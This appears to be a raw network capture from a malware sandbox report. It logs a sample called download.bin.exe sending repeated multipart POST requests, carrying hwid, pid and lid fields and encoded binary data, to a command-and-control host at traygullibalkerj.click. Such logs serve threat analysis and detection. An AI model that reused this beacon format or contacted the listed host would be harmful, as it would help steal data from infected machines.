2025-01-03 22:03:00 UTC	1137	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 22:03:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=2kfqrhr88o8phlgidketafnin8; expires=Tue, 29 Apr 2025 15:49:39 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iFXdgeCHDKRIiBTx%2F9eswjHF7u6Lfy9I%2FA9jh5aOwOiZPfs1Lm%2BNmuD7pjI%2BGwbxq8OZg0hHs3N7pZlM8brl0Khnl6WUJRuv%2F%2BmbL%2FgWRxoVA1hktP1njbMVs9vjI3Nl0ZtJOxXA2kzm"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc646c04e2c727b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1963&min_rtt=1955&rtt_var=750&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2856&recv_bytes=953&delivery_rate=1442687&cwnd=232&unsent_bytes=0&cid=1b659866efa5db57&ts=489&x=0"
2025-01-03 22:03:00 UTC	232	IN	Data Raw: 34 39 39 34 0d 0a 68 79 4e 64 30 47 4c 58 79 56 78 33 55 43 43 4b 4a 78 33 73 61 33 57 66 6b 35 4a 54 48 43 58 4e 79 67 78 4c 59 45 33 4e 66 33 50 38 41 53 76 79 57 4f 50 6c 66 67 51 31 41 72 42 54 62 35 6b 4f 57 62 33 79 39 6e 45 6d 51 36 79 6d 66 79 35 4d 62 37 73 53 55 62 31 46 50 4c 77 52 73 75 56 2b 45 69 67 43 73 48 78 6d 7a 67 34 62 76 61 6d 77 4e 6e 5a 48 72 4b 5a 75 4b 67 73 69 76 52 4d 51 37 30 38 36 75 41 65 30 72 54 30 62 50 55 58 76 51 6e 79 47 42 52 7a 79 2b 2f 39 78 4d 41 65 6f 73 43 35 78 51 67 43 6f 43 78 4c 4b 51 69 36 37 51 4b 72 6c 4a 31 55 31 54 71 67 64 50 34 30 4f 46 2f 50 31 39 6a 68 30 54 61 57 75 62 79 38 4b 50 61 51 5a 47 2b 39 42 4f 62 6b 4e 76 62 6b 77 45 54 Data Ascii: 4994hyNd0GLXyVx3UCCKJx3sa3Wfk5JTHCXNygxLYE3Nf3P8ASvyWOPlfgQ1ArBTb5kOWb3y9nEmQ6ymfy5Mb7sSUb1FPLwRsuV+EigCsHxmzg4bvamwNnZHrKZuKgsivRMQ7086uAe0rT0bPUXvQnyGBRzy+/9xMAeosC5xQgCoCxLKQi67QKrlJ1U1TqgdP40OF/P19jh0TaWuby8KPaQZG+9BObkNvbkwET
2025-01-03 22:03:00 UTC	1369	IN	Data Raw: 70 4f 36 55 68 38 7a 6b 64 58 2b 75 6d 77 61 54 34 55 6e 61 74 2f 4f 42 63 69 76 78 74 52 2b 67 38 6d 38 67 65 35 36 32 5a 56 4f 6b 37 6d 51 48 79 42 44 68 62 39 34 2f 38 78 66 55 2b 6e 72 47 51 6d 44 53 43 68 46 78 62 74 53 44 69 39 42 37 32 74 4d 52 5a 79 44 4b 68 43 5a 38 35 52 56 39 33 68 38 7a 4a 71 53 72 37 6f 63 57 63 62 62 36 67 52 55 62 30 42 4f 62 77 42 75 4b 73 73 48 54 6c 4a 37 56 64 30 68 77 51 61 2f 66 7a 36 50 6e 31 48 71 4b 4a 6b 4a 67 67 72 6f 68 41 58 35 55 46 2f 2f 45 43 79 73 33 35 4e 63 6d 48 74 56 58 69 43 48 31 58 48 73 65 39 2f 5a 77 65 6f 70 43 35 78 51 69 65 71 48 68 4c 75 54 6a 79 36 43 36 65 72 4c 42 4d 2f 52 2f 70 44 65 6f 41 44 46 4f 2f 37 2f 6a 64 39 54 71 53 68 61 79 34 47 62 2b 46 64 46 76 30 42 5a 2f 49 68 75 4b 41 79 48 Data Ascii: pO6Uh8zkdX+umwaT4Unat/OBcivxtR+g8m8ge562ZVOk7mQHyBDhb94/8xfU+nrGQmDSChFxbtSDi9B72tMRZyDKhCZ85RV93h8zJqSr7ocWcbb6gRUb0BObwBuKssHTlJ7Vd0hwQa/fz6Pn1HqKJkJggrohAX5UF//ECys35NcmHtVXiCH1XHse9/ZweopC5xQieqHhLuTjy6C6erLBM/R/pDeoADFO/7/jd9TqShay4Gb+FdFv0BZ/IhuKAyH
2025-01-03 22:03:00 UTC	1369	IN	Data Raw: 50 62 5a 77 4a 47 2b 2f 39 2b 6a 64 78 53 71 50 6f 49 47 6b 46 4e 2b 39 46 55 63 39 43 4b 37 45 4b 39 35 34 39 47 7a 78 46 2f 67 56 67 77 42 42 58 2b 76 32 77 61 54 35 4b 72 71 42 6f 4f 77 30 69 72 42 4d 66 36 6b 51 77 75 67 43 31 70 6a 73 52 4f 55 6e 72 53 48 75 63 41 78 66 31 39 50 45 37 64 41 66 68 36 47 6b 78 51 6e 66 76 4c 41 62 75 41 77 71 78 44 72 75 73 4b 46 55 74 44 50 45 46 65 49 4a 4a 54 37 33 38 2b 44 52 37 53 4b 36 69 59 43 77 49 49 36 63 54 45 76 64 4f 4f 37 49 4d 76 61 45 7a 47 7a 5a 4b 34 55 35 30 69 41 6b 57 39 37 47 2b 63 58 6c 66 37 2f 41 75 48 51 55 6a 6f 68 4a 54 30 45 49 78 76 41 65 6a 36 79 46 62 4b 77 4c 76 53 54 2f 57 53 52 76 30 38 66 73 37 65 6b 65 6f 70 57 73 71 42 53 79 69 47 68 76 72 52 6a 75 2b 43 62 69 74 50 68 49 32 52 2f Data Ascii: PbZwJG+/9+jdxSqPoIGkFN+9FUc9CK7EK9549GzxF/gVgwBBX+v2waT5KrqBoOw0irBMf6kQwugC1pjsROUnrSHucAxf19PE7dAfh6GkxQnfvLAbuAwqxDrusKFUtDPEFeIJJT738+DR7SK6iYCwII6cTEvdOO7IMvaEzGzZK4U50iAkW97G+cXlf7/AuHQUjohJT0EIxvAej6yFbKwLvST/WSRv08fs7ekeopWsqBSyiGhvrRju+CbitPhI2R/
2025-01-03 22:03:00 UTC	1369	IN	Data Raw: 53 52 7a 49 2f 2b 5a 78 59 51 6d 32 36 47 6b 6c 51 6e 66 76 46 42 6a 33 54 7a 47 37 44 62 4f 6a 4f 52 73 2f 53 65 35 4f 65 49 6b 50 47 76 58 38 39 54 4a 2f 51 36 57 36 62 53 49 49 49 71 56 64 58 36 56 47 4a 2f 4a 59 39 59 77 79 50 43 4a 5a 2b 6c 4d 2f 6b 55 63 4f 76 66 62 38 63 53 59 48 72 4b 64 6e 4a 67 6f 6e 6f 42 49 56 36 30 63 35 76 77 57 36 6f 53 77 64 50 45 2f 6a 53 6e 53 63 43 52 72 35 2f 66 51 35 64 55 33 76 35 69 34 75 47 6d 2f 33 58 53 54 6f 54 6a 2b 78 46 76 57 30 63 41 78 79 52 65 51 46 4a 38 34 46 47 66 33 2b 2f 44 31 31 54 36 36 6b 59 43 34 48 4a 71 63 56 41 2b 52 46 4e 37 4d 4f 75 71 6f 36 45 44 64 47 37 30 46 35 67 55 6c 5a 76 66 62 6f 63 53 59 48 67 49 39 62 61 79 4d 56 37 77 4a 66 2f 41 45 34 76 6b 44 74 36 7a 49 57 50 6b 72 6e 51 33 61 Data Ascii: SRzI/+ZxYQm26GklQnfvFBj3TzG7DbOjORs/Se5OeIkPGvX89TJ/Q6W6bSIIIqVdX6VGJ/JY9YwyPCJZ+lM/kUcOvfb8cSYHrKdnJgonoBIV60c5vwW6oSwdPE/jSnScCRr5/fQ5dU3v5i4uGm/3XSToTj+xFvW0cAxyReQFJ84FGf3+/D11T66kYC4HJqcVA+RFN7MOuqo6EDdG70F5gUlZvfbocSYHgI9bayMV7wJf/AE4vkDt6zIWPkrnQ3a
2025-01-03 22:03:00 UTC	1369	IN	Data Raw: 62 48 36 4f 6e 70 45 71 36 31 68 4b 41 4d 70 76 52 6f 59 39 30 38 79 76 51 69 39 6f 6a 38 52 4e 30 2f 75 53 58 57 50 44 68 6e 7a 2b 62 42 2f 50 6b 43 33 36 44 5a 70 49 7a 2b 30 44 77 66 6f 59 44 4b 39 51 4b 72 6c 4a 31 55 31 54 71 67 64 50 34 63 62 45 2f 44 6a 2b 54 5a 77 53 4b 79 36 62 79 51 4a 50 61 67 53 46 65 4a 4e 4f 62 30 47 74 4b 34 30 47 54 56 48 34 30 70 7a 7a 6b 64 58 2b 75 6d 77 61 54 35 70 70 4c 74 35 4b 67 77 6b 75 51 5a 52 2b 67 38 6d 38 67 65 35 36 32 5a 56 4d 55 6e 6a 51 58 2b 43 43 52 50 77 38 65 49 2b 65 55 43 6d 6f 33 77 6a 42 53 69 6b 46 52 72 71 52 79 32 2b 44 71 65 75 4c 41 64 79 44 4b 68 43 5a 38 35 52 56 38 76 32 34 43 46 39 42 5a 36 2b 62 54 38 4a 49 71 4e 64 44 71 74 59 66 37 55 4d 39 66 4e 2b 45 7a 31 4c 36 30 70 2b 68 77 55 61 Data Ascii: bH6OnpEq61hKAMpvRoY908yvQi9oj8RN0/uSXWPDhnz+bB/PkC36DZpIz+0DwfoYDK9QKrlJ1U1TqgdP4cbE/Dj+TZwSKy6byQJPagSFeJNOb0GtK40GTVH40pzzkdX+umwaT5ppLt5KgwkuQZR+g8m8ge562ZVMUnjQX+CCRPw8eI+eUCmo3wjBSikFRrqRy2+DqeuLAdyDKhCZ85RV8v24CF9BZ6+bT8JIqNdDqtYf7UM9fN+Ez1L60p+hwUa
2025-01-03 22:03:00 UTC	1369	IN	Data Raw: 6b 2b 66 36 53 6d 58 43 6f 5a 62 37 42 54 43 4b 56 47 4d 2f 4a 59 39 61 67 35 46 6a 4e 49 34 55 6c 77 69 51 30 46 39 2f 62 69 4d 48 39 4d 6f 71 52 75 4a 41 38 6c 72 68 51 63 36 55 77 34 74 51 2b 77 36 33 42 56 4e 56 71 6f 48 54 2b 76 42 42 7a 78 71 71 70 78 59 51 6d 32 36 47 6b 6c 51 6e 66 76 48 52 76 67 53 7a 4b 78 44 37 61 35 50 78 4d 67 51 75 56 50 62 59 51 43 45 76 44 38 2f 54 4a 34 51 61 53 6b 66 43 41 43 4c 4b 52 64 58 36 56 47 4a 2f 4a 59 39 59 67 70 41 7a 68 46 35 46 4e 30 6a 77 6f 42 38 4f 47 77 66 7a 35 57 71 4c 6b 75 63 52 51 2f 75 42 6f 4f 71 31 68 2f 74 51 7a 31 38 33 34 54 4f 30 54 76 51 33 47 63 44 42 48 79 2f 76 6b 34 65 6b 2b 73 71 47 6f 74 42 53 71 73 45 52 72 69 51 6a 43 32 43 62 75 69 4d 56 56 38 41 75 39 64 50 39 5a 4a 4e 75 62 79 2f Data Ascii: k+f6SmXCoZb7BTCKVGM/JY9ag5FjNI4UlwiQ0F9/biMH9MoqRuJA8lrhQc6Uw4tQ+w63BVNVqoHT+vBBzxqqpxYQm26GklQnfvHRvgSzKxD7a5PxMgQuVPbYQCEvD8/TJ4QaSkfCACLKRdX6VGJ/JY9YgpAzhF5FN0jwoB8OGwfz5WqLkucRQ/uBoOq1h/tQz1834TO0TvQ3GcDBHy/vk4ek+sqGotBSqsERriQjC2CbuiMVV8Au9dP9ZJNuby/
2025-01-03 22:03:00 UTC	1369	IN	Data Raw: 39 71 32 64 70 54 47 2b 6f 42 56 47 39 41 52 2b 35 46 72 43 73 4b 46 63 48 51 65 5a 4c 65 4a 68 4a 43 4d 4b 2f 73 44 35 6b 42 2f 65 52 64 32 6b 46 49 2b 39 46 55 66 42 47 50 37 55 61 6f 36 77 79 42 44 6c 50 35 47 64 77 69 52 38 55 38 76 4c 68 4f 44 4a 4d 6f 75 67 67 61 51 55 33 37 30 56 52 79 6b 59 70 73 53 2b 32 75 6a 64 56 66 41 4c 76 55 7a 2f 57 53 53 6d 39 34 2f 4d 68 66 55 69 2b 6c 69 35 78 47 78 48 76 46 67 66 69 55 54 79 6b 43 37 69 6e 4c 79 74 79 47 72 77 58 4c 64 78 62 52 65 4b 78 37 77 34 77 42 36 37 6f 4e 68 41 62 62 37 6c 64 53 62 63 50 66 36 42 41 37 65 74 35 46 69 42 51 37 6b 5a 70 6a 55 34 70 77 39 62 6d 4f 33 6c 58 71 4c 39 68 61 55 78 76 6f 46 31 4a 33 41 45 32 74 52 75 6b 76 54 4d 46 4e 51 4c 58 43 7a 2b 57 53 55 2b 39 78 50 4d 2f 63 45 Data Ascii: 9q2dpTG+oBVG9AR+5FrCsKFcHQeZLeJhJCMK/sD5kB/eRd2kFI+9FUfBGP7Uao6wyBDlP5GdwiR8U8vLhODJMouggaQU370VRykYpsS+2ujdVfALvUz/WSSm94/MhfUi+li5xGxHvFgfiUTykC7inLytyGrwXLdxbReKx7w4wB67oNhAbb7ldSbcPf6BA7et5FiBQ7kZpjU4pw9bmO3lXqL9haUxvoF1J3AE2tRukvTMFNQLXCz+WSU+9xPM/cE
2025-01-03 22:03:00 UTC	1369	IN	Data Raw: 4b 67 63 6f 34 78 55 41 36 45 31 2f 2f 45 43 67 6f 44 49 54 50 31 65 6e 56 47 6d 4e 48 78 43 78 2b 65 45 38 63 67 65 51 35 69 34 78 51 6e 66 76 4b 42 4c 72 54 7a 69 6b 45 66 69 4c 4e 52 6b 78 54 75 6c 43 50 38 42 4a 45 62 32 70 6f 33 38 2b 51 37 37 6f 4e 6e 6c 51 64 50 70 4f 52 72 55 54 49 50 77 5a 39 62 31 2b 54 57 41 4d 71 46 63 2f 31 6b 6c 51 2f 75 50 69 4e 33 31 52 72 4f 39 51 46 77 4d 69 6f 46 45 66 37 6b 45 34 6f 68 61 75 35 7a 59 57 4b 46 6a 57 65 31 53 43 44 78 44 6e 39 76 59 58 58 67 66 68 36 47 46 70 57 68 62 76 56 56 48 61 44 33 2b 71 51 4f 33 72 43 78 59 38 54 4f 39 54 62 73 4d 68 4e 4d 66 4c 73 68 31 35 55 75 32 63 61 54 6b 54 4a 4b 49 52 55 61 73 42 4f 66 4a 59 35 65 56 2b 45 53 4d 43 73 42 55 74 31 56 78 45 71 71 47 69 4c 6a 42 65 37 37 34 Data Ascii: Kgco4xUA6E1//ECgoDITP1enVGmNHxCx+eE8cgeQ5i4xQnfvKBLrTzikEfiLNRkxTulCP8BJEb2po38+Q77oNnlQdPpORrUTIPwZ9b1+TWAMqFc/1klQ/uPiN31RrO9QFwMioFEf7kE4ohau5zYWKFjWe1SCDxDn9vYXXgfh6GFpWhbvVVHaD3+qQO3rCxY8TO9TbsMhNMfLsh15Uu2caTkTJKIRUasBOfJY5eV+ESMCsBUt1VxEqqGiLjBe774
2025-01-03 22:03:00 UTC	1369	IN	Data Raw: 65 38 43 58 2f 77 42 4b 66 4a 59 35 75 56 2b 42 33 49 61 71 41 4a 78 67 77 67 55 38 2f 4c 69 49 33 68 45 75 61 73 70 46 7a 77 4b 6f 68 41 55 36 30 59 42 6a 43 47 2f 75 7a 4d 61 4e 51 44 49 51 6d 6d 4e 4e 79 6e 4b 34 50 63 68 50 47 47 73 76 6d 31 70 54 47 2b 33 58 55 6d 6c 59 44 57 69 44 62 71 73 66 44 55 31 56 4f 73 46 4d 63 34 4e 56 36 57 78 31 54 78 7a 51 71 47 76 4c 41 67 49 50 36 49 53 46 71 64 68 4f 4b 51 44 39 65 56 2b 47 58 49 61 71 45 52 31 6e 67 51 59 2b 72 33 33 4b 33 6b 48 34 65 68 67 61 56 70 76 72 68 63 42 36 45 34 34 2f 67 61 37 70 58 34 4b 66 46 75 6f 55 7a 2f 57 57 6c 6d 39 34 37 42 70 50 67 43 73 75 6e 77 76 41 54 6d 73 57 69 2f 62 62 43 32 31 45 4c 62 70 44 78 67 32 56 50 31 47 62 34 6b 33 4b 64 44 6a 39 79 46 39 42 5a 36 2b 62 53 6b 4d Data Ascii: e8CX/wBKfJY5uV+B3IaqAJxgwgU8/LiI3hEuaspFzwKohAU60YBjCG/uzMaNQDIQmmNNynK4PchPGGsvm1pTG+3XUmlYDWiDbqsfDU1VOsFMc4NV6Wx1TxzQqGvLAgIP6ISFqdhOKQD9eV+GXIaqER1ngQY+r33K3kH4ehgaVpvrhcB6E44/ga7pX4KfFuoUz/WWlm947BpPgCsunwvATmsWi/bbC21ELbpDxg2VP1Gb4k3KdDj9yF9BZ6+bSkM

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49732	104.21.112.1	443	5440	C:\Users\user\Desktop\download.bin.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-03 22:03:01 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=279JXMJWCB6H User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18127 Host: traygullibalkerj.click
2025-01-03 22:03:01 UTC	15331	OUT	Data Raw: 2d 2d 32 37 39 4a 58 4d 4a 57 43 42 36 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 46 31 36 32 30 34 45 44 31 44 46 42 45 44 44 44 39 39 35 38 39 43 45 38 41 45 36 36 35 44 35 0d 0a 2d 2d 32 37 39 4a 58 4d 4a 57 43 42 36 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 32 37 39 4a 58 4d 4a 57 43 42 36 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 57 47 36 49 36 53 2d 2d 77 65 62 35 35 0d 0a 2d 2d 32 37 39 4a 58 4d 4a 57 43 42 36 48 0d 0a Data Ascii: --279JXMJWCB6HContent-Disposition: form-data; name="hwid"DF16204ED1DFBEDDD99589CE8AE665D5--279JXMJWCB6HContent-Disposition: form-data; name="pid"2--279JXMJWCB6HContent-Disposition: form-data; name="lid"WG6I6S--web55--279JXMJWCB6H
2025-01-03 22:03:01 UTC	2796	OUT	Data Raw: c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 Data Ascii: 'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwm
2025-01-03 22:03:02 UTC	1131	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 22:03:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=o7rrmv17p9k1jkpe9nl1evsut2; expires=Tue, 29 Apr 2025 15:49:40 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ee3qMm3taVhQ7Z5kHIcDE3ON9nXEQMYWqXy0GLd5IqPU1dF0KJqdXIqbMqgzrpfNv65VhhMgcbqS02av%2BI%2B0fecq15GGXDCke1tIbZMu7EOfyDUD0iZBTKJIveDN4zzN9QiGC37A3myT"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc646c74879c34f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1594&min_rtt=1482&rtt_var=635&sent=10&recv=22&lost=0&retrans=0&sent_bytes=2858&recv_bytes=19089&delivery_rate=1970310&cwnd=181&unsent_bytes=0&cid=347e72fe543be0a8&ts=644&x=0"
2025-01-03 22:03:02 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-03 22:03:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49733	104.21.112.1	443	5440	C:\Users\user\Desktop\download.bin.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-03 22:03:02 UTC	284	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=WJB88NK0NUISPTV User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8766 Host: traygullibalkerj.click
2025-01-03 22:03:02 UTC	8766	OUT	Data Raw: 2d 2d 57 4a 42 38 38 4e 4b 30 4e 55 49 53 50 54 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 46 31 36 32 30 34 45 44 31 44 46 42 45 44 44 44 39 39 35 38 39 43 45 38 41 45 36 36 35 44 35 0d 0a 2d 2d 57 4a 42 38 38 4e 4b 30 4e 55 49 53 50 54 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 57 4a 42 38 38 4e 4b 30 4e 55 49 53 50 54 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 57 47 36 49 36 53 2d 2d 77 65 62 35 35 0d 0a 2d 2d 57 4a 42 38 38 Data Ascii: --WJB88NK0NUISPTVContent-Disposition: form-data; name="hwid"DF16204ED1DFBEDDD99589CE8AE665D5--WJB88NK0NUISPTVContent-Disposition: form-data; name="pid"2--WJB88NK0NUISPTVContent-Disposition: form-data; name="lid"WG6I6S--web55--WJB88
2025-01-03 22:03:03 UTC	1132	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 22:03:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=kv0u0j2jt2655rlio1gjkfikuh; expires=Tue, 29 Apr 2025 15:49:42 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GSQrai7EU%2Beb83gYs6aCubmZx1zwfeW0K5T4adzCic9NP4Zebs9PfPzhW8J8yX582FqHtfWn%2BeT%2F0QjdnEwY0WR3kA7ABBtMn58UEpDYoGZubTIqQjPD3QPQ%2B2VAJrQdZMGprA8r7Mal"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc646ce9aee43b3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1540&min_rtt=1540&rtt_var=770&sent=7&recv=16&lost=0&retrans=1&sent_bytes=4254&recv_bytes=9708&delivery_rate=257722&cwnd=203&unsent_bytes=0&cid=d9b4e59956ee2507&ts=568&x=0"
2025-01-03 22:03:03 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-03 22:03:03 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49734	104.21.112.1	443	5440	C:\Users\user\Desktop\download.bin.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-03 22:03:03 UTC	286	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=GLAZF8MAVNQQBS8R User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20425 Host: traygullibalkerj.click
2025-01-03 22:03:03 UTC	15331	OUT	Data Raw: 2d 2d 47 4c 41 5a 46 38 4d 41 56 4e 51 51 42 53 38 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 46 31 36 32 30 34 45 44 31 44 46 42 45 44 44 44 39 39 35 38 39 43 45 38 41 45 36 36 35 44 35 0d 0a 2d 2d 47 4c 41 5a 46 38 4d 41 56 4e 51 51 42 53 38 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 47 4c 41 5a 46 38 4d 41 56 4e 51 51 42 53 38 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 57 47 36 49 36 53 2d 2d 77 65 62 35 35 0d 0a 2d 2d 47 4c Data Ascii: --GLAZF8MAVNQQBS8RContent-Disposition: form-data; name="hwid"DF16204ED1DFBEDDD99589CE8AE665D5--GLAZF8MAVNQQBS8RContent-Disposition: form-data; name="pid"3--GLAZF8MAVNQQBS8RContent-Disposition: form-data; name="lid"WG6I6S--web55--GL
2025-01-03 22:03:03 UTC	5094	OUT	Data Raw: 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: M?lrQMn 64F6(X&7~`aO
